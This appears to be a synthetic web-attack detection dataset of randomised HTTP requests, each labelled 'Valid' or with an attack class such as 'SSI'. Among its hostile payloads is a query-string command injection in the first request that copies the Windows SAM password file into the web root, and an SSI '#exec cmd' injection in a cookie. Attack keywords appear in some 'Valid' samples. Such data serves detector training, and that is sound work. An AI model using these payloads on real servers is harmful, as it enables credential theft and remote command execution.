GET /0dEujs_d2A/6soo8lhUluy/yer1waiyrtj1/aed/OgtyeobNe/eFUhMhH3@1x/C9.bEThttpLBN/uuhrdte/v2P1lp22yuCEhkku/ymhaving/7danapJetls6Tn/Eiutesbknijrrhw.jpg?0mhN=%7Es&ahtedcyi5a=v%299n&xyl=erquOdesy8d&anLkaeebAiN60oa=l&nqT=91.75.32.108++++%7C+++copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&ttTliicesds5u=l%7E&mq3Tkhguytwt=-19hou&csD_=hqg+tmetaeval%29nIe+&gEix3he=zdhU_po1unDG&L-GKx=044801899&nnsaihe=23094&eiy3sier=eiCgNyAjAj39&J0Yf=+cd2%28rj%3Dbis&etcjI-cNzoptiOftp=tUjATasFtue HTTP/1.0
Host: www.Tbaih8w.org
Connection: nloan
Accept: image/*;q=0.8, image/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 141.50.68.204
Cookie: rpselaPn=57373556
Cookie2: $Version="71"
Date: Fri, 15 Aug 08 04:15:04 CET
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: "gENoWcr5j_zjOQ1c-Rd"
If-None-Match: *
If-Range: "jmV9Lm@XnkJX5lD4I5l"
Max-Forwards: 81
MIME-Version: 7.9
Pragma: EsNriea='9S'
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: /nx8t/nnod.pl
TE: trailers,chunked
Trailer: Host
User-Agent: rtntlrrphd (fMfQot8E9; a8bAZAV8j; o7y.P.)
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: identity
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 917 189.231.61.87:5869 "aizogi" "Fri, 19 Mar 10 07:08:15 UTC"
X-Forwarded-For: 209.98.157.41
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42840
Start - Id: 11150
class: Valid
GET /buljhttnrm/rJQB9MeG_T/azZmY8s.4sTGNDf5/7KOptP5W./eoe/btfZBiBcO@rmiqvVms/eLKFP0rST7iZ8uXpDZd/enno/th3e3sEwwkddimeaE/aGkgPpoh4Fsfxzgnoppd/aeO/mQOweszta.jpeg? HTTP/1.0
Host: www.hpeodzbbs.st:0462
Connection: atdrxpuG
Accept: image/*;q=0.3, video/mpeg;q=0.4, audio/*
Accept-Charset: iso-8859-8-i;q=0.3, macintosh
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: 7bu='mdo'
Client-ip: 124.3.147.71
Cookie: egltje=tSmssp;4RTgElwfbPtmp=rltrrlyh8otk
Cookie2: $Version="58"
Date: Thu, 27 Jan 05 17:23:59 UTC
ETag: W/"pqa7.Eb.076tCbGL"
Expect: 100-continue
From: daneee@lheneowi.org
If-Modified-Since: Thu, 17 Dec 09 10:40:42 GMT
If-Unmodified-Since: Tue, 18 Aug 09 08:11:36 UTC
If-Match: *
If-None-Match: "hEtQl0zxY9tZ_V2UE"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.7
Pragma: sdNi2aw='1o0bwE6'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: 5-671745,5852-9861
Referer: /awiRmogt/ofdsnnj/os1b7ey.asp
TE: trailers,gzip;q=0.8,deflate;q=0.1
Trailer: Max-Forwards
User-Agent: holghh2l/7.9.6.6
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 5.8 197.162.148.7, 1.0 21.38.131.37
Transfer-Encoding: identity
Upgrade: hgrW/3.1
Warning: 319 57.235.65.0 "jRcg2cbta" "Thu, 02 Apr 09 11:25:24 GMT"
X-Forwarded-For: 207.202.183.212
X-Serial-Number: 98553683859236748
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11150
Start - Id: 19252
class: Valid
GET /o4F___qv4QVJo5/M2ei73Yxm44/t_ub@R.GBuUAUuI3/02.nsf?oxn=sm&alnwLfma6knsool=easrsg&YFe2window.opendocumentx=fl%40V&resnbbl=3&o7o3tjwa=ratonftnidh&biaheeta=3b%5DG&etp3f6enm=reXj7X&xe8r7rtnh3zS=77267&RIKqn=en&aeRm5oan=zJ_r_fM007Sg&1noNeolpa9=loFKm&metarMDZgUtB=tw7G2bvE%40 HTTP/1.0
Host: 58.73.105.130
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.6, iso-2022-kr;q=0.8, x-mac-korean;q=0.0, x-mac-roman, iso-8859-8;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: 4etibee4-jiaaeONt
Cache-Control: max-stale
Client-ip: 238.226.105.52
Cookie: aeers=UgajcUegshprruys;totenta2=l2dtEStmpnRto6
Cookie2: $Version="1"
Date: Mon, 06 Aug 07 23:13:42 GMT
ETag: W/"w-KCJLovu_2fLKpu78t"
Expect: sti5tt=rtadtD;tngt=2zhi
From: eihFze1l@giUuEnH.gov
If-Modified-Since: Fri, 13 Mar 09 21:50:35 CET
If-Unmodified-Since: Fri, 08 Apr 05 04:48:09 UTC
If-Match: "nnE8AYJypvY0tguQ-"
If-None-Match: *
If-Range: "lIoowp421iPh_-854Cw"
Max-Forwards: 5
MIME-Version: 1.8
Pragma: ll8mdets='3enrts4e'
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: Digest username="TkhsbnTs"
Range: 060-,489-
Referer: /36oem.wmn
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 3.9; lb-as; rv:1.8.6) Gecko/22585252
UA-CPU: x86
UA-Disp: 273,4092,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7913x3682
Via: 3.0 76.184.237.237, 9.3 152.113.3.199
Transfer-Encoding: identity
Upgrade: hi5nal/8.0, hn5t/9.2, ykhito/3.3, 43fett/7.0, nnahn/6.1
Warning: 703 192.57.185.155 "qHwmeihaet" "Sat, 24 Apr 10 16:12:15 UTC"
X-Forwarded-For: 144.205.1.122
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19252
Start - Id: 11532
class: Valid
GET /rmWI@18zwmm@F/zydernaosc6orniyad/uUq3Yxv/0sMnN5t5DyhYVoB4OrXN.cgi?Aoh5cpositionfpL=4%3A%28&e8=ih0PafTP&eMazfefwElc=daC%3D&uqccbtihci=551688&lwtud5Q3=sdntHe%2Blocationygwr&rkgpe=dodNn&souIaDdatqnaf=pQGlbb&Kqor022wcE_M=0828724951&eou=957808&8e21ddkp=i%2B6style&ehSer7n=TargAt&ttsaoiiln9iBmra=ranpitvuciewasnt HTTP/1.1
Host: 175.56.104.128
Connection: ttn4eiax
Accept: application/*, audio/*;q=0.9
Accept-Charset: iso-8859-6, windows-1255, x-mac-icelandic;q=0.9
Accept-Encoding: identity;q=0.3, gzip
Accept-Language: 6sayRn7x-eiz, It1cou-vuehensr
Cache-Control: no-store
Client-ip: 37.133.2.177
Cookie: nwat=vIakNnwindow.open&Acd;ghatxssew=70;lotjnsi6=eEq
Cookie2: $Version="72"
Date: Sat, 24 Nov 07 12:13:55 CET
ETag: "DpYyaYBL0ilHEdE"
Expect: Nosd=et5e
From: l8yyeu@teeroh8t1m.biz
If-Modified-Since: Sat, 02 Apr 05 11:18:18 CET
If-Unmodified-Since: Sun, 02 Jan 05 13:27:56 GMT
If-Match: "Hqj7qQMZrR.Q6V_"
If-None-Match: "wj9iMX6olV_p2UKqg"
If-Range: Wed, 05 Oct 05 10:45:07 UTC
Max-Forwards: 1
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dDFuMjpBbHRnTA==
Authorization: Basic YmgzZkQycDo2bXNteW9l
Range: 95777-,06-396283,4310-04938
Referer: http://ma8sn.gov/eHle/5ee1fe/tnltGR/hNnetnt8/Ehmn.swf
TE: deflate;q=0.1,deflate;q=0.7,chunked
Trailer: If-Modified-Since
User-Agent: drrswiocnotoeqreh
UA-CPU: PowerPC
UA-Disp: 9055,045,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5189x1158
Via: FTP/9.6 25.61.110.214, FTP/9.2 69.182.174.1, HTTP/0.2 71.30.61.77
Transfer-Encoding: 3tRLgr
Upgrade: doots/6.6
Warning: 881 35.69.28.129 "mesddqopoikepkyer" 
X-Forwarded-For: 191.250.24.214
X-Serial-Number: 65042597
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11532
Start - Id: 40227
class: SSI
PUT /eI.jpeg? HTTP/1.1
Content-Length: 198
Content-Language: Loychdte,oecezba,hxd7t
Content-Encoding: identity
Content-Location: /hget/vnsc6co/osd1i7/9aean/936ne9b.cfm
Content-MD5: dGVob2lwdHRtc2NkZGV0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 04 12:42:08 UTC
Host: 254.121.224.200:871
Connection: close
Accept: video/*;q=0.1, application/postscript;q=0.3
Accept-Charset: x-mac-hebrew, windows-1258;q=0.3, x-mac-korean;q=0.6, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: w-yedei;q=0.3, celmaoi-oiot;q=0.8
Cache-Control: no-cache
Client-ip: 156.234.193.64
Cookie: n7odaYNmi=<!--    #exec    cmd="/bin/ls    -l /home/Tm/mAOe"     -->;omhOdzaimha=e-rzv1D530;tucwgae=w&~;eo1e=x5re gtsock_streamei7;.pBj=4522
Date: Tue, 11 Aug 09 23:10:04 GMT
If-Modified-Since: Tue, 10 Feb 04 12:36:46 GMT
If-Match: "3NyTZwDTKJZsZ-An1zb."
Max-Forwards: 74
Pragma: cjy5ft=coadyl
Referer: /weyfbr/mzoroa/lWtyp/eptent93.mpg
TE: trailers,trailers,deflate
User-Agent: cebhye/2.4
X-Forwarded-For: 192.60.2.149
X-Serial-Number: 33744432549577

igpdro=4ASn&D8a7tseaceaT=eo6PS&jnn=cmr>telneti9m%&/oS&qtl5nG=asls9k&insseu=6987595&atsavSthFt5=053&afhho=5rsnxtlinkrd&wt=896019&4tlibkExrt=e95_-T21NlqO&rsgt5sxE43t=7440&ttya1v38vs=n0rUzeUgKN

End - Id: 40227
Start - Id: 12015
class: Valid
GET /oDLnX/2rwc0iyunz9kbhi/or1tsesltmelhlSfne/tlwoap0/6enlrdl7e/zc6V4d0uyjkQPbX/jY2/6x/amp0iAui/img_H6hvbscripto-QQ/rDqK3h06.css?edsiaaoeidho=aauaOrom3acnI7&o7gasWopge=258081 HTTP/1.1
Host: www.rtih2.com:8
Connection: es9d
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.1, deflate
Accept-Language: ay0t8r-heRd;q=0.8, tatlii-chsher;q=0.8, koios-e0t, ataaT2n-d9, Aesxpc-td;q=0.2
Cache-Control: no-transform
Client-ip: 174.198.206.240
Cookie: nsystemCKrK=soiI
Cookie2: $Version="2"
Date: Tue, 13 Sep 05 09:36:07 UTC
ETag: W/"0UWaamKaSvlEq8LSQghc"
Expect: wnvtMyqr
From: d2Oa@neu4att5.ch
If-Modified-Since: Mon, 20 Mar 06 22:08:45 GMT
If-Unmodified-Since: Fri, 02 Sep 05 17:29:51 UTC
If-Match: *
If-None-Match: "z.yPQzfJ_DpqSCp-X8"
If-Range: Wed, 02 Dec 09 04:19:05 UTC
Max-Forwards: 377
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: -8,856500-,-6463
Referer: /rcu5onl/ozxfmie.cgi
TE: gzip
Trailer: Accept
User-Agent: hn3oND1n62 (uRFk6x3l; szKCY-gDb-)
UA-CPU: x86
UA-Disp: 123,4822,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 165x736
Via: FTP/3.3 83.192.113.240, lcH/2.5 www.l6Ax38.html:383, 8.5 48.43.33.255:141
Transfer-Encoding: gzip
Upgrade: oarnt/7.2, 24ahha/3.6, sa6zo/1.6, 6tfete/1.1
Warning: 188 www.kfdnt3g.shtml "5UopedxhgtiSicsla" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 733133463900664569
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12015
Start - Id: 10256
class: Valid
GET /f-TWAYws-vP3SjEWwmg/owsdcontd/insertnh41mailwPgbinN/pcdtnprdoaeost/nthU/eX52nPgg/YyxmIposition@/i49mlQDJ59uoVEV0QVb/yeineegrtsk3NhRto/ltaeRorozaesea5a/eu.cgi?whqtrslnuehe=h51P&RSrcoT=eS4tittrune&uuhaagi9o=dnetcat&ornbrde=9720252896&xceseKdugtite=4552314&kto=843267&aeec=oidemw&atstrltadar=26512290&ttTcu=yaonoeahtis2ps&ds6bme=4ot1&Enessg=lqupfmrhk&Ik=245168747&xe8xeatmedngd=58010417 HTTP/1.0
Host: www.perwtn3oe9.ch
Connection: coNrsan
Accept: */*;q=0.3
Accept-Charset: windows-1254;q=0.4, iso-8859-8-i, gb2312;q=0.7, iso-8859-7
Accept-Encoding: *
Accept-Language: poatifee-epihNGno;q=0.2, t-oig;q=0.0
Cache-Control: no-store
Client-ip: 212.136.9.102
Cookie: PIN8zUf=e8Wlotcn-;3ygfsetEneaf=114971
Cookie2: $Version="771"
Date: Mon, 05 Dec 05 05:52:15 UTC
ETag: "xASWwwX_8vyWVNKr"
Expect: 100-continue
From: guJn@i6rimsl.ch
If-Modified-Since: Fri, 28 Apr 06 10:23:56 UTC
If-Unmodified-Since: Mon, 09 Jul 07 05:43:04 GMT
If-Match: *
If-None-Match: "v3t-49vUinTrMskmIkS"
If-Range: "N9.ncYUEg@Q9-DmkZq"
Max-Forwards: 1887
MIME-Version: 0.7
Pragma: tere8c='oYrua'
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: un85h w7tdoee=shhmiael
Range: 48806-,859-40,-983
Referer: http://rAmtEokn.st/tttv/uertiiFe/nctdTyS/hoEut/aoabisy.png
TE: trailers,trailers,gzip;q=0.4
Trailer: TE
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 2.4; tl-ac; rv:9.4.5) Gecko/12561756
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0000x0475
Via: 4.1 www.oaeet.htm, FTP/8.8 67.21.144.255:0, FTP/3.4 242.226.31.200
Transfer-Encoding: deflate
Upgrade: xspt/1.2, taqm/0.9
Warning: 381 www.swT2Ci.png "AmssmipzjstT" 
X-Forwarded-For: 75.202.70.37
X-Serial-Number: 7837553364029
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10256
Start - Id: 2410
class: Valid
GET /sm6reparMtdmwmele9rc/qlcl/mwV4hRT_hW4@1f/tw-AhvyMhJ8P.jpg? HTTP/1.1
Host: www.rirsmRnI.net
Connection: close
Accept: application/*;q=0.4, audio/*
Accept-Charset: x-mac-chinesetrad, utf-8
Accept-Encoding: deflate, identity, gzip, compress;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 168.90.123.51
Cookie: mttefr=mctothy9r4fascc;selp=bQU4H4s4@za;Bsueg=711381
Cookie2: $Version="21"
Date: Fri, 14 Sep 07 17:22:16 UTC
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: mnmhdgus
From: 0talRina@qieneot.fr
If-Modified-Since: Sun, 24 Dec 06 15:09:39 GMT
If-Unmodified-Since: Sat, 09 Oct 04 14:55:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Nov 05 10:50:14 GMT
Max-Forwards: 0
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: NTLM aDNsbmhPYW5wYmF0cmNuZWZhZW50c2FkcHRrZXliMndp
Range: 69893-,12785-855,77-
Referer: http://www.iasr.org/hirxhn/d71eue.swf
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 5.8; rh-rn; rv:7.0.2) Gecko/07951718
UA-CPU: MIPS
UA-Disp: 5566,8703,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4150x3363
Via: oa1d/4.1 228.71.195.237, FTP/5.8 78.184.245.10
Transfer-Encoding: deflate
Upgrade: hikle/8.3, vhr/8.6, eWn/8.8, T5wt/3.1
Warning: 068 135.230.35.43 "qrbou" "Thu, 23 Mar 06 24:58:53 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2410
Start - Id: 33130
class: Valid
POST /aecoTEwqaho6qnVttb/yVdropX/rlideX@X1@o/lyiuosftr/eioewcihgetskieiUS/g@7sgEolipMpc-z7/elr9ioiamnoB/tsDmrEoasaojl2e.htm? HTTP/1.1
Content-Length: 182
Content-Language: Rwr,un
Content-Encoding: deflate
Content-Location: /e4Osoz/lsni/9iitoo/ckdree.jpg
Content-MD5: YXNxbnJjbjNlYWl0dHIxZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Jun 08 04:26:53 CET
Last-Modified: Wed, 05 Sep 07 04:46:27 UTC
Host: 223.113.121.148:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-1;q=0.3, iso-8859-2, iso-8859-3, windows-1254;q=0.6
Accept-Encoding: compress
Accept-Language: hoY-qgldnns;q=0.9, a-e, iAhow-e10ta3rq, r-lNh
Cache-Control: max-stale
Client-ip: 230.124.221.154
Cookie: nwmtqe=Itatah ldtnaicj;yhwfej=linkybing2;gohmj7Idtcieg=inr rio
Cookie2: $Version="24"
Date: Fri, 16 Apr 04 10:51:52 GMT
ETag: W/"y05-2wAWbf.A9q_gfP"
Expect: fxc03c9
From: lcteseg@iehlhresle.uk
If-Modified-Since: Fri, 19 Dec 08 24:13:06 CET
If-Unmodified-Since: Thu, 29 Mar 07 03:31:23 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 May 05 09:48:22 GMT
Max-Forwards: 4668
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM eTJzbmhobTRzMm5vamx0ZGtzZU1sdnRzb2xjYXVlS3VuMXNyeHN2eUVudGU5dA==
Authorization: Digest opaque="d3Nact"
Range: -787,80891-464,53849-
Referer: /h2be/oueeztAo/ysaasops/ftaec.jpeg
TE: trailers
Trailer: Pragma
User-Agent: hznDr8hSL http://www.g9lhEuit.uk
UA-CPU: MIPS
UA-Disp: 035,199,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.1 www.osmnsW.shtml:746, 6.3 www.hiean.jpeg, nneesr/6.5 www.siut.png
Transfer-Encoding: compress
Upgrade: i1oE/1.8, htoee/2.9, lnsedh/9.7, rNtlnM/5.3
Warning: 903 www.rzea4yr.htm "r5iGesaOlmea2osamrqa" "Tue, 10 Feb 04 12:04:44 GMT"
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

6zDJOAZIjZGbgsound=h&4fei6lmtwfetne=69629953&veRO=t_puwMJqalT0&eSetlnacer4Ua=dh&uSkoas2hlcadwa=92&tt=846171633&ooes=32747355&uagi2e=alocationx3ioUApctgroup by[dr&6htihenegth=n.-w8X

End - Id: 33130
Start - Id: 11439
class: Valid
GET /m0sTlniet/D3nUE/maeeuixhdiooluniv/h6HwM-wXRPfvQrLw/ny.php?ls=5&sepc=eq%40cEe&tee=757&a3=+LaMgoufesobC&ue=afa&eae=0452821 HTTP/1.1
Host: www.tedAattt.cz
Connection: keep-alive
Accept: image/*, text/*, application/x-tar;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: noto1-9snha, rtotHar-osbttn;q=0.8
Cache-Control: min-fresh=7401
Client-ip: 212.244.209.81
Cookie: elwwkevl=:Lnc;icadr=60;mgroup byEO_h5kK.@=nx4;acthTsta2shb2=37200035;ouenIaae=8931809;t53ta4lts=rcIhscrAsa
Cookie2: $Version="19"
Date: Tue, 06 Mar 07 23:04:34 CET
ETag: W/"egMQWZwl9wS4TZIP4MU_"
Expect: 100-continue
From: oavsyn@seSu.com
If-Modified-Since: Thu, 15 Sep 05 11:35:34 UTC
If-Unmodified-Since: Fri, 20 Jul 07 19:50:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Nov 09 02:16:20 CET
Max-Forwards: 04
MIME-Version: 0.2
Pragma: lmhrWr6=1rlo
Proxy-Authorization: u68si atohazra=reig
Authorization: Basic ZWFleTo2cGZpZQ==
Range: 17-873364,-1915
Referer: http://wiS7.org/hEihy/ll55YheX.nsf
TE: trailers,chunked,chunked;q=0.2
Trailer: From
User-Agent: Mozilla/9.6 (Windows; U; Win98 5.1; et-t1; rv:5.3.7) Gecko/17640072
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 535x704
Via: 6.1 www.ed7t.tiff:650, 7.1 34.110.25.169, HTTP/3.7 212.137.227.68
Transfer-Encoding: compress
Upgrade: elees/2.8
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 40.167.68.225
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11439
Start - Id: 13477
class: Valid
GET /slcb1reuibOmr/C8@-plibgX1/xu7jWedeKhwgYq6v/otiwhe/sqfQo6H9kw.htm?ua91rreht=e4mm&crhoail=zYfOs&8_IAgroup byGgsams-=8234628&oaepekbpgh2lgeh=OhguoserviceskA&esnp6edIl=zxsyknho6P HTTP/1.1
Host: www.uAbeq5.gov
Connection: orxasoyc
Accept: audio/basic;q=0.3, text/xml;q=0.6
Accept-Charset: koi8, iso-8859-5;q=0.5
Accept-Encoding: compress
Accept-Language: Godt8-ogdtEcc
Cache-Control: no-transform
Client-ip: 168.3.160.150
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Thu, 06 May 04 02:25:10 UTC
ETag: W/"GmUUIhFbJ@1bmc5s"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Thu, 08 Jan 04 07:24:29 GMT
If-Unmodified-Since: Sun, 20 Feb 05 08:36:10 CET
If-Match: *
If-None-Match: "KL4B1_4k9tWDGyW_lttt"
If-Range: *
Max-Forwards: 9315
MIME-Version: 4.6
Pragma: iz9iee=msaz
Proxy-Authorization: Basic cmFkMmE6cmVmT2RybQ==
Authorization: Digest opaque="bln1e8gm"
Range: 00941-
Referer: http://www.et8hei.cz/unrteet/nkaactic.avi
TE: gzip,deflate
Trailer: TE
User-Agent: esqzfpOa http://www.ezxIm1tr.org
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 801x0437
Via: FTP/7.9 238.182.2.37, HTTP/6.3 232.17.196.131
Transfer-Encoding: compress
Upgrade: odo/1.8
Warning: 395 142.107.115.72:81 "auagelgcsknaoh" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13477
Start - Id: 24043
class: Valid
GET /window.openskhQCFpix8S/tHM0QNQxfS5Vqj/tQbzNmp/ua5rgea/zMoQ4w5@hvNW0Yn4.asp?5ds=srEaq4Oejrih&rco=%5Chnidh%2Btre%40yti7&seiore=3zJ+esxhNxmftpue0&rsesThrirQ=seadmin4&HLDeF6formR-uSR=+%5CfSs HTTP/1.0
Host: www.anits.gov
Connection: keep-alive
Accept: */*
Accept-Charset: big5, windows-1250, windows-1257;q=0.4, x-mac-japanese;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 72.162.94.53
Cookie: st7aanps=ph7fouo-rehexecK;Stnlurtn20o7h=505;ocdee1=1882
Cookie2: $Version="03"
Date: Sun, 11 Feb 07 05:29:50 UTC
ETag: W/"20wIx6HmMcAyfM-Ple"
Expect: era0lhbh
From: ategn@e61x0hpQf.ch
If-Modified-Since: Mon, 04 Oct 04 10:36:55 UTC
If-Unmodified-Since: Wed, 15 Jun 05 02:45:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 5.8
Pragma: l=NlLefsTn
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: lnooe 7tatmoTa=ubrUp
Range: 3-,-932
Referer: http://www.aldnauU.it/GRaredom/edrrn/OsiSD2e.msf
TE: trailers
Trailer: User-Agent
User-Agent: eWcNACp http://www.osacht9.com
UA-CPU: StrongARM
UA-Disp: 6759,036,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 314x0873
Via: HTTP/7.0 202.184.252.173, nCsolt/6.5 5.212.155.103:14
Transfer-Encoding: compress
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 81619019081
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24043
Start - Id: 17426
class: Valid
GET /nhtfseanWwub/LDui/bl4Ma8Om4xuTt/huDIv4r0MucSbsp5/aoae3wsodaetpu2eo0/Trjst6tw.jpeg?r2duiniinioE=07722&3Esbcdajaxoh=passthrurEndet+rrj&ena8acr=24076171&httpsd7winntCforminclude=713&yIH9s=l%3Biadminbhe&seridgkan=82788&ns=h5iHAo&iaaao=i2oyIzs&dpScoiLa=qwE1tap&axsA4E=ta5&giiNur8d=royRe&eeto=70406&ar=6a8pano&wpEb2YnrsdncWn4=i&toegsthciai=mf9uq HTTP/1.0
Host: www.odoeies2.fr:6378
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, iso-10646-ucs-2;q=0.3, iso-8859-5, x-mac-icelandic
Accept-Encoding: deflate, deflate;q=0.3, compress
Accept-Language: F2O3haU-hoc, bfn1lnr-lh;q=0.1, N-9cens;q=0.2, 1voha-h;q=0.6, erioo-r5o
Cache-Control: max-stale
Client-ip: 142.30.7.74
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="3"
Date: Sat, 28 Aug 04 01:03:10 UTC
ETag: "y0xm9wmWFPHbPcTLx"
Expect: 100-continue
From: asobeo@yaOtdneg.de
If-Modified-Since: Thu, 27 Jul 06 10:03:34 GMT
If-Unmodified-Since: Thu, 10 Aug 06 05:13:59 CET
If-Match: "iVGmASmbRyywi9aWr"
If-None-Match: "RjsF9-I..lRZqAJ_F3C"
If-Range: Wed, 01 Oct 08 18:53:09 CET
Max-Forwards: 43
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic aWZyaGlvY246eGllc2Fh
Range: -4628,35-7
Referer: /ecrew/gCnui/itlqLrtp.php4
TE: gzip;q=0.1,chunked;q=0.9
Trailer: If-Match
User-Agent: Mozilla/5.0 (X11; U; Linux i386 4.7; zt-ta; rv:3.2.2) Gecko/26322182
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: 7.5 www.nylhso.htm:9760, FTP/5.7 www.b37sr.tiff, FTP/8.2 152.115.162.180:14960
Transfer-Encoding: compress
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 161.13.62.114
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17426
Start - Id: 20442
class: Valid
GET /edn8nHetDewoTd2/-h@PBD.swf?ArgwdVB=0&4nrxobAspacseT=1233&2K2o3G=fDV&7mtnRismta=6101209083&th0gel0rtap5s=0028462&ojcmH=029&to6=N%2B1%7Eowb%3Fnl%2Btwereo%5Bey&AE=emc9oaejeeFo2&hOresf8ao=d%3BHaer+N+6cO+eH&5m=icZIpNQHFIQ&ls=x+l&Qj=locationboe&gCTqc7=saqetmnenrw5F HTTP/1.1
Host: 205.254.120.22:4544
Connection: ke4o
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: max-age=43636
Client-ip: 202.176.144.141
Cookie: trbaM=rin9r ssi;ohrsbe6et=Htbge9bwrntte1biwm;P296=394159836;i6spr=041
Cookie2: $Version="455"
Date: Tue, 11 Apr 06 06:52:53 GMT
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Thu, 28 Feb 08 21:59:31 GMT
If-Unmodified-Since: Sun, 27 Jul 08 05:06:47 GMT
If-Match: *
If-None-Match: "2hQd.SWSqlMYVgv8HnO"
